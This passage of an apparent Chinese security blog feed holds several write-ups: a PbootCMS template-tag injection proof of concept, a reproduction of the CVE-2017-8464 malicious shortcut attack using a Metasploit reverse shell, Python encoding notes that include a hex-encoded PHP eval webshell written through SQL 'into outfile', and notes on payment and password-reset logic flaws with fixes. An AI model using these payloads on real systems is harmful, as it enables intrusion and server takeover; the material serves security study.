title="Poc"></a>Poc</h1><p>Poc:</p><p><code>{pboot:if(phpinfo())}!{/pboot:if}</code></p><p>最后经过寻找,只要发现后台能编辑的地方,基本上都能插入<code>IF条件语句标签</code>并能解析执行。</p><p><img src="/image/pbootcms/poc.png" alt="poc.png"></p><p>访问首页就可以看到<code>phpinfo</code>页面</p><p><img src="/image/phpinfo.png" alt="phpinfo.png"></p><p>然后尝试了多次多点均能Getshell.</p><h1 id="另外"><a href="#另外" class="headerlink" title="另外"></a>另外</h1><p>前台某处存在CSRF,利用其修改后台内容,但均有提升<code>修改成功</code>的页面,做不到无感知修改内容,因此<code>CSRF+IF条件语句标签</code>也是比较鸡肋。</p><p><img src="/image/pbootcms/mod.png" alt="mod.png"></p>]]></content>
<summary type="html"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PBOOT CMS!想伱所想,让一切皆有可能!</span><br><span class="line"></span><br><span class="line">PBOOT CMS!为伱所想,让一切皆有可能!</span><br><span class="line"></span><br><span class="line">PBOOT CMS!做伱所想,让一切皆有可能!</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="代码审计" scheme="https://cr4ckm3.top/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="CMS" scheme="https://cr4ckm3.top/tags/CMS/"/>
</entry>
<entry>
<title>一个快捷方式引发的xxx</title>
<link href="https://cr4ckm3.top/2017/06/16/%E4%B8%80%E4%B8%AA%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%BC%95%E5%8F%91%E7%9A%84%E9%92%93%E9%B1%BC%E4%BA%8B%E4%BB%B6(%20CVE-2017-8464%20)/"/>
<id>https://cr4ckm3.top/2017/06/16/%E4%B8%80%E4%B8%AA%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%BC%95%E5%8F%91%E7%9A%84%E9%92%93%E9%B1%BC%E4%BA%8B%E4%BB%B6(%20CVE-2017-8464%20)/</id>
<published>2017-06-16T06:04:51.000Z</published>
<updated>2019-08-30T10:00:41.573Z</updated>
<content type="html"><![CDATA[<center><h1>``"声明:本文章供用于安全检测或网络攻防研究参考,如做非法用途后果自负。"``</h1></center><span id="more"></span><p>前两天刷朋友圈看到一篇关于windows的新漏洞,点击一个快捷方式便可被反弹shell。立马引起了我的兴趣。<br><a href="http://bobao.360.cn/learning/detail/3977.html">安全客的一篇文章</a></p><h2 id="0x00-CVE-2017-8464-震网三代"><a href="#0x00-CVE-2017-8464-震网三代" class="headerlink" title="0x00 CVE-2017-8464 (震网三代)"></a>0x00 CVE-2017-8464 (震网三代)</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">漏洞编号: CVE-2017-8464</span><br><span class="line"></span><br><span class="line">漏洞等级: 严重</span><br><span class="line"></span><br><span class="line">漏洞概要:如果用户打开攻击者精心构造的恶意LNK文件,则会造成远程代码执行。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。</span><br><span class="line"></span><br><span class="line">攻击者可以通过可移动驱动器(U盘)或远程共享等方式将包含恶意LNK文件和与之相关的恶意二进制文件传播给用户。当用户通过Windows资源管理器或任何能够解析LNK文件的程序打开恶意的LNK文件时,与之关联的恶意二进制代码将在目标系统上执行。</span><br><span class="line"></span><br><span class="line">受影响版本</span><br><span class="line"></span><br><span class="line">桌面系统:Windows 10, 7, 8.1, 8, Vista和Windows RT 8.1</span><br><span class="line"></span><br><span class="line">服务器系统:Windows Server 2016,2012,2008</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464">微软安全技术中心</a></p><p>从上面的链接看,微软6月13号发布了补丁的消息.<br>到目前6月16号,也就是我复现的时间,发现getshell还是挺容易的。</p><h2 id="0x01-设置监听端"><a href="#0x01-设置监听端" class="headerlink" title="0x01 设置监听端"></a>0x01 设置监听端</h2><p>首先用msf生成windows的反弹后门payload:<code>cherry.ps1</code><br><img src="/image/%E7%AC%AC%E4%B8%80%E6%AD%A5.png" alt="第一步"></p><p>其次用msf开启监听,并设置payload<br><img src="/image/%E7%AC%AC%E4%BA%8C%E6%AD%A5.png" alt="第二步"><br><img src="/image/%E7%AC%AC%E4%B8%89%E6%AD%A5.png"></p><p>到这里监听端已经准备好了。接下来就是把后门部署到服务器端、以及创建恶意快捷方式。</p><h2 id="0x02-部署服务器端"><a href="#0x02-部署服务器端" class="headerlink" title="0x02 部署服务器端"></a>0x02 部署服务器端</h2><p>在这里,我用的是Python的简易服务器。<br><img src="/image/%E5%BC%80%E5%90%AF%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8.png" alt="简易的HTTP服务"></p><p>当靶机点击快捷方式后,会向服务器请求<code>cherry.ps1</code>后门。</p><h2 id="0x03-生成快捷方式"><a href="#0x03-生成快捷方式" class="headerlink" title="0x03 生成快捷方式"></a>0x03 生成快捷方式</h2><p>生成一个远程的代码的快捷方式<br><img src="/image/%E7%AC%AC%E5%9B%9B%E6%AD%A5.png" alt="lnk"></p><p><img src="/image/%E5%AF%B9%E6%AF%94.png" alt="duibi"></p><p>左边是生成的快捷方式的最初图标,右边是替换之后的图标。</p><p>看表面,相信是分辨不出来的。估计也没人会在打开桌面的快捷方式之前会右键看属性再打开应用吧?</p><h2 id="0x04-反弹shell"><a href="#0x04-反弹shell" class="headerlink" title="0x04 反弹shell"></a>0x04 反弹shell</h2><p>当用户点击恶意快捷方式之后,监听端就会收到反弹回来的shell。</p><p><img src="/image/getshell.png" alt="getshell"><br>So , success!</p><h2 id="0x05-关于样本"><a href="#0x05-关于样本" class="headerlink" title="0x05 关于样本"></a>0x05 关于样本</h2><p>把生成的恶意快捷方式拿去扫描,得出的结果中只有6家可检测到是恶意脚本。<br><img src="/image/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90.png" alt="1"><br><img src="/image/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%902.png" alt="2"><br><img src="/image/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%903.png" alt="3"></p><p>到我上传扫描截止,可以看到:百度、360、腾讯、金山都没有报毒的。</p>]]></content>
<summary type="html"><center><h1>``"声明:本文章供用于安全检测或网络攻防研究参考,如做非法用途后果自负。"``</h1></center></summary>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
<category term="CVE" scheme="https://cr4ckm3.top/tags/CVE/"/>
</entry>
<entry>
<title>Python编码转换</title>
<link href="https://cr4ckm3.top/2017/06/07/python%E7%BC%96%E7%A0%81/"/>
<id>https://cr4ckm3.top/2017/06/07/python%E7%BC%96%E7%A0%81/</id>
<published>2017-06-07T12:55:00.000Z</published>
<updated>2019-08-30T10:00:44.373Z</updated>
<content type="html"><![CDATA[<h1 id="Python编码转换"><a href="#Python编码转换" class="headerlink" title="Python编码转换"></a><div style="text-align:center">Python编码转换</div></h1><h1 id="Python-2-lt-——-gt-Python-3"><a href="#Python-2-lt-——-gt-Python-3" class="headerlink" title="Python 2 <——> Python 3"></a>Python 2 <——> Python 3</h1><p>例子 <code>a = '\xc4\xe3\xba\xc3'</code></p><p>在<code>Python 2</code>中</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a </span><br><span class="line"><span class="string">'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> a</span><br><span class="line">你好</span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">u'\u4f60\u597d'</span></span><br><span class="line"><span class="meta">>>> </span>a</span><br><span class="line"><span class="string">u'\u4f60\u597d'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> a</span><br><span class="line">你好</span><br><span class="line"><span class="meta">>>> </span>b = <span class="string">b'\xe4\xbd\xa0\xe5\xa5\xbd'</span></span><br><span class="line"><span class="meta">>>> </span>b</span><br><span class="line"><span class="string">'\xe4\xbd\xa0\xe5\xa5\xbd'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> b</span><br><span class="line">浣犲ソ</span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> b.encode(<span class="string">'utf8'</span>)</span><br><span class="line">你好</span><br><span class="line"><span class="meta">>>> </span>b.encode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="string">'e4bda0e5a5bd'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>在<code>Python 3</code>中</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span>a </span><br><span class="line"><span class="string">'你好'</span></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">u'\u4f60\u597d'</span></span><br><span class="line"><span class="meta">>>> </span>a</span><br><span class="line"><span class="string">'你好'</span></span><br><span class="line"><span class="meta">>>> </span>a.encode(<span class="string">'gbk'</span>)</span><br><span class="line"><span class="string">b'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span>b = a.encode(<span class="string">'utf-8'</span>)</span><br><span class="line"><span class="string">b'\xe4\xbd\xa0\xe5\xa5\xbd'</span></span><br><span class="line"><span class="meta">>>> </span>b.decode(<span class="string">'utf-8'</span>)</span><br><span class="line"><span class="string">'你好'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><ul><li>Python 2默认<code>ascii</code>编码</li><li>Python 3默认<code>utf-8</code>编码</li></ul><p>举个例子<br><code>a = '你好'</code></p><h2 id="在Python-2-中"><a href="#在Python-2-中" class="headerlink" title="在Python 2 中"></a>在Python 2 中</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">'你好'</span></span><br><span class="line"><span class="meta">>>> </span>a</span><br><span class="line"><span class="string">'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">u'你好'</span></span><br><span class="line"><span class="string">u'\u4f60\u597d'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x01-HEXtoUTF8"><a href="#0x01-HEXtoUTF8" class="headerlink" title="0x01 HEXtoUTF8"></a>0x01 HEXtoUTF8</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">>>>> a = <span class="string">'e6bc8fe6b49ee6a380e6b58be8a1a8'</span></span><br><span class="line"><span class="meta">>>> </span>a.decode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="string">'\xe6\xbc\x8f\xe6\xb4\x9e\xe6\xa3\x80\xe6\xb5\x8b\xe8\xa1\xa8'</span></span><br><span class="line"><span class="meta">>>> </span>a.decode(<span class="string">'hex'</span>).decode(<span class="string">'utf8'</span>)</span><br><span class="line"><span class="string">u'\u6f0f\u6d1e\u68c0\u6d4b\u8868'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> a.decode(<span class="string">'hex'</span>).decode(<span class="string">'utf8'</span>)</span><br><span class="line">漏洞检测列表</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x02-URL编码"><a href="#0x02-URL编码" class="headerlink" title="0x02 URL编码"></a>0x02 URL编码</h1><p>url编码是一种浏览器用来打包表单输入的格式.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">from</span> urllib <span class="keyword">import</span> *</span><br><span class="line"><span class="meta">>>> </span>quote(<span class="string">"<script>alert(1)</script>"</span>) <span class="comment">#URL编码</span></span><br><span class="line"><span class="string">'%3Cscript%3Ealert%281%29%3C/script%3E'</span></span><br><span class="line"><span class="meta">>>> </span>unquote(<span class="string">'%3Cscript%3Ealert%281%29%3C/script%3E'</span>) <span class="comment">#URL解码</span></span><br><span class="line"><span class="string">'<script>alert(1)</script>'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x03-Base64"><a href="#0x03-Base64" class="headerlink" title="0x03 Base64"></a>0x03 Base64</h1><p>Base64常常用作网页表单和HTTP传输的一些参数,也常用于邮件协议传输用户信息等。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">import</span> base64</span><br><span class="line"><span class="meta">>>> </span>base64.b64encode(<span class="string">"admin"</span>) <span class="comment">#base64加密</span></span><br><span class="line"><span class="string">'YWRtaW4='</span></span><br><span class="line"><span class="meta">>>> </span>base64.b64decode(<span class="string">'YWRtaW4='</span>)</span><br><span class="line"><span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>base32</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">import</span> base64</span><br><span class="line"><span class="meta">>>> </span>base64.b32encode(<span class="string">'admin'</span>) <span class="comment">#base32加密</span></span><br><span class="line"><span class="string">'MFSG22LO'</span></span><br><span class="line"><span class="meta">>>> </span>base64.b32decode(<span class="string">'MFSG22LO'</span>) <span class="comment">#base32解密</span></span><br><span class="line"><span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x04-md5"><a href="#0x04-md5" class="headerlink" title="0x04 md5"></a>0x04 md5</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"><span class="meta">>>> </span>m = md5()</span><br><span class="line"><span class="meta">>>> </span>m.update(<span class="string">'admin'</span>)</span><br><span class="line"><span class="meta">>>> </span>m.hexdigest()</span><br><span class="line"><span class="string">'f6fdffe48c908deb0f4c3bd36c032e72'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x04-Unicode转中文-万国码"><a href="#0x04-Unicode转中文-万国码" class="headerlink" title="0x04 Unicode转中文(万国码)"></a>0x04 Unicode转中文(万国码)</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> <span class="string">u'\u9a8c\u8bc1\u7801\u9519\u8bef'</span></span><br><span class="line">验证码错误</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x05-Hex"><a href="#0x05-Hex" class="headerlink" title="0x05 Hex"></a>0x05 Hex</h1><p>MySQL注入可以使用hex绕过htmlspecialchars()函数从而写入webshell。</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="number">0x3c3f70687020406576616c28245f504f53545b615d293b203f3e</span> <span class="keyword">into</span> outfile <span class="string">'/web/1.php'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Hex加解密</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">>>> </span><span class="string">'<?php @eval($POST[a]); ?>'</span>.encode(<span class="string">'hex'</span>) <span class="comment">#加密</span></span><br><span class="line"><span class="string">'3c3f70687020406576616c2824504f53545b615d293b203f3e'</span></span><br><span class="line"><span class="meta">>>> </span><span class="string">'3c3f70687020406576616c2824504f53545b615d293b203f3e'</span>.decode(<span class="string">'hex'</span>) <span class="comment">#解密</span></span><br><span class="line"><span class="string">'<?php @eval($POST[a]); ?>'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x06-Ascii"><a href="#0x06-Ascii" class="headerlink" title="0x06 Ascii"></a>0x06 Ascii</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>l = <span class="built_in">map</span>(<span class="built_in">ord</span>,<span class="string">"<?php phpinfo(); ?>"</span>)</span><br><span class="line">[<span class="number">60</span>, <span class="number">63</span>, <span class="number">112</span>, <span class="number">104</span>, <span class="number">112</span>, <span class="number">32</span>, <span class="number">112</span>, <span class="number">104</span>, <span class="number">112</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">102</span>, <span class="number">111</span>, <span class="number">40</span>, <span class="number">41</span>, <span class="number">59</span>, <span class="number">32</span>, <span class="number">63</span>, <span class="number">62</span>]</span><br><span class="line"><span class="meta">>>> </span><span class="string">''</span>.join(<span class="built_in">map</span>(<span class="built_in">chr</span>,l))</span><br><span class="line"><span class="string">'<?php phpinfo(); ?>'</span></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="Python编码转换"><a href="#Python编码转换" class="headerlink" title="Python编码转换"></a><div style="text-align:center">Python编码转换</div></h1><h1 </summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="Python" scheme="https://cr4ckm3.top/tags/Python/"/>
</entry>
<entry>
<title>逻辑漏洞 Ⅲ</title>
<link href="https://cr4ckm3.top/2017/06/07/%E8%B6%8A%E6%9D%83%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/"/>
<id>https://cr4ckm3.top/2017/06/07/%E8%B6%8A%E6%9D%83%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/</id>
<published>2017-06-07T12:16:00.000Z</published>
<updated>2019-08-30T10:00:43.933Z</updated>
<content type="html"><![CDATA[<h1 id="逻辑漏洞–-gt-越权访问"><a href="#逻辑漏洞–-gt-越权访问" class="headerlink" title="逻辑漏洞–>越权访问"></a>逻辑漏洞–>越权访问</h1><p>越权访问</p><ul><li><p>未授权访问<br>未授权访问: 就是在没有任何授权的情况下对需要认证的资源进行访问以及增删改查。</p></li><li><p>平行越权<br>平行越权: 同等用户权限之下,不用进入其他用户的账户也可以对别的用户资料或者订单等信息进行增删改查操作的目的。</p></li><li><p>垂直越权<br>垂直越权: 通过低权限向高权限跨越形成垂直越权访问。</p></li></ul>]]></content>
<summary type="html"><h1 id="逻辑漏洞–-gt-越权访问"><a href="#逻辑漏洞–-gt-越权访问" class="headerlink" title="逻辑漏洞–&gt;越权访问"></a>逻辑漏洞–&gt;越权访问</h1><p>越权访问</p>
<ul>
<li><p>未授权访问</summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
</entry>
<entry>
<title>逻辑漏洞 Ⅱ</title>
<link href="https://cr4ckm3.top/2017/06/07/%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/"/>
<id>https://cr4ckm3.top/2017/06/07/%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/</id>
<published>2017-06-07T11:15:54.000Z</published>
<updated>2019-08-30T10:00:42.453Z</updated>
<content type="html"><![CDATA[<h1 id="逻辑漏洞–-gt-支付漏洞"><a href="#逻辑漏洞–-gt-支付漏洞" class="headerlink" title="逻辑漏洞–>支付漏洞"></a>逻辑漏洞–>支付漏洞</h1><h1 id="支付漏洞"><a href="#支付漏洞" class="headerlink" title="支付漏洞"></a>支付漏洞</h1><h2 id="0x00-缺乏数据签名"><a href="#0x00-缺乏数据签名" class="headerlink" title="0x00 缺乏数据签名"></a>0x00 缺乏数据签名</h2><p><a href="https://">乌云案例之顺丰宝业务逻辑漏洞</a></p><h2 id="0x01-URL中含有可修改敏感数据"><a href="#0x01-URL中含有可修改敏感数据" class="headerlink" title="0x01 URL中含有可修改敏感数据"></a>0x01 URL中含有可修改敏感数据</h2><p><a href="">乌云案例之乐视商城逻辑支付漏洞</a></p><h2 id="0x02-替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。"><a href="#0x02-替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。" class="headerlink" title="0x02 替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。"></a>0x02 替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。</h2><p><a href="">乌云案例之读览天下支付逻辑漏洞</a></p><h2 id="0x03-设计缺陷-可提交负人民币的订单"><a href="#0x03-设计缺陷-可提交负人民币的订单" class="headerlink" title="0x03 设计缺陷(可提交负人民币的订单)"></a>0x03 设计缺陷(可提交负人民币的订单)</h2><p><a href="">乌云案例之天翼云盘通支付逻辑漏洞</a></p><h2 id="0x04-订单提交逻辑漏洞-订单提交Burp可修改运费"><a href="#0x04-订单提交逻辑漏洞-订单提交Burp可修改运费" class="headerlink" title="0x04 订单提交逻辑漏洞(订单提交Burp可修改运费)"></a>0x04 订单提交逻辑漏洞(订单提交Burp可修改运费)</h2><p><a href="">乌云案例之药房网订单提交逻辑漏洞</a></p><h2 id="0x05-绕过支付-直接访问构造的URL-Payload可直接绕过。"><a href="#0x05-绕过支付-直接访问构造的URL-Payload可直接绕过。" class="headerlink" title="0x05 绕过支付 直接访问构造的URL Payload可直接绕过。"></a>0x05 绕过支付 直接访问构造的URL Payload可直接绕过。</h2><p><a href="">乌云案例之淘美网绕过支付</a></p><h2 id="0x06-修复方案"><a href="#0x06-修复方案" class="headerlink" title="0x06 修复方案"></a>0x06 修复方案</h2><ul><li>1 和银行交易时,做数据签名,对用户金额和订单签名。</li><li>2 敏感参数不要明文放在URL中</li><li>3 服务端效验客户端提交的参数</li><li>4 在服务端计算金额的时候,一定要判断是否为正数。</li><li>5 支付过程中加一个服务器生成的key,用户校验参数有没有被串改。</li><li>6 如果一定需要用URL传递相关参数,建议进行后端的签名验证</li><li>7 订单金额和充值接口返回的数据进行校验</li><li>8 提交订单时后台判断单价是否与数据库中相符,如不符则返回错误。</li><li>9 支付时应从服务器拉取数据,而不是直接读客户端的值!!</li></ul><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="">myh0st</a></p>]]></content>
<summary type="html"><h1 id="逻辑漏洞–-gt-支付漏洞"><a href="#逻辑漏洞–-gt-支付漏洞" class="headerlink" title="逻辑漏洞–&gt;支付漏洞"></a>逻辑漏洞–&gt;支付漏洞</h1><h1 id="支付漏洞"><a href="#支付漏洞"</summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
</entry>
<entry>
<title>逻辑漏洞 Ⅰ</title>
<link href="https://cr4ckm3.top/2017/06/06/%E5%AF%86%E7%A0%81%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/"/>
<id>https://cr4ckm3.top/2017/06/06/%E5%AF%86%E7%A0%81%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/</id>
<published>2017-06-06T12:14:54.000Z</published>
<updated>2019-08-30T10:00:45.213Z</updated>
<content type="html"><![CDATA[<h1 id="逻辑漏洞–-gt-密码重置"><a href="#逻辑漏洞–-gt-密码重置" class="headerlink" title="逻辑漏洞–>密码重置"></a>逻辑漏洞–>密码重置</h1><h1 id="密码找回"><a href="#密码找回" class="headerlink" title="密码找回"></a><div style="text-align: center">密码找回</div></h1><h2 id="0x00-密码找回验证条件可社工"><a href="#0x00-密码找回验证条件可社工" class="headerlink" title="0x00 密码找回验证条件可社工"></a>0x00 密码找回验证条件可社工</h2><p>验证帐号与邮箱地址是否匹配即可<br>验证帐号与手机号是否匹配即可<br><a href="https://www.baidu.com/">.</a></p><h2 id="0x01-验证码可爆破"><a href="#0x01-验证码可爆破" class="headerlink" title="0x01 验证码可爆破"></a>0x01 验证码可爆破</h2><p>验证码多用户通用<br>用户认证体系存在漏洞<br>验证码时效长,可暴力破解验证码<br><a href=""></a></p><h2 id="0x02-修改密码未验证用户"><a href="#0x02-修改密码未验证用户" class="headerlink" title="0x02 修改密码未验证用户"></a>0x02 修改密码未验证用户</h2><p>结构控制不严格,服务端未进行验证。<br>用户ID或邮箱出现在URL,可直接修改。<br><a href=""></a></p><h2 id="0x03-密码修改页面可预测"><a href="#0x03-密码修改页面可预测" class="headerlink" title="0x03 密码修改页面可预测"></a>0x03 密码修改页面可预测</h2><p>可预测URL,直接执行下一步URL可绕过。<br><a href=""></a></p><h2 id="0x04-重置密码新密码出现在返回的数据包中"><a href="#0x04-重置密码新密码出现在返回的数据包中" class="headerlink" title="0x04 重置密码新密码出现在返回的数据包中"></a>0x04 重置密码新密码出现在返回的数据包中</h2><p><a href=""></a></p><h2 id="0x05-密码重置验证码出现在返回数据包中"><a href="#0x05-密码重置验证码出现在返回数据包中" class="headerlink" title="0x05 密码重置验证码出现在返回数据包中"></a>0x05 密码重置验证码出现在返回数据包中</h2><p><a href=""></a></p><h2 id="0x06-验证码接收帐号由客户端决定"><a href="#0x06-验证码接收帐号由客户端决定" class="headerlink" title="0x06 验证码接收帐号由客户端决定"></a>0x06 验证码接收帐号由客户端决定</h2><p>Burp拦截可修改验证码的接收端。<br><a href=""></a></p><h2 id="0x07-修改返回包绕过验证码找回密码"><a href="#0x07-修改返回包绕过验证码找回密码" class="headerlink" title="0x07 修改返回包绕过验证码找回密码"></a>0x07 修改返回包绕过验证码找回密码</h2><p><a href=""></a></p><h2 id="0x08-密码重置验证码多人公用"><a href="#0x08-密码重置验证码多人公用" class="headerlink" title="0x08 密码重置验证码多人公用"></a>0x08 密码重置验证码多人公用</h2><p><a href=""></a></p><h2 id="0x09-修复方案"><a href="#0x09-修复方案" class="headerlink" title="0x09 修复方案"></a>0x09 修复方案</h2><ul><li>1减少验证码有效时间</li><li>2 使用后即销毁</li><li>3 增加验证码复杂程序,整个md5 不困难吧,</li><li>4 限制该功能单个ip提交频率</li><li>5 对重要参数加入验证码同步信息或时间戳;</li><li>6 重置密码后,新密码不应返回在数据包中。</li><li>7 接收验证码的帐号由服务端提供,不能信任客户端提交的数据</li></ul>]]></content>
<summary type="html"><h1 id="逻辑漏洞–-gt-密码重置"><a href="#逻辑漏洞–-gt-密码重置" class="headerlink" title="逻辑漏洞–&gt;密码重置"></a>逻辑漏洞–&gt;密码重置</h1><h1 id="密码找回"><a href="#密码找回"</summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
</entry>
<entry>
<title>浅谈PHP弱类型安全之CTF</title>
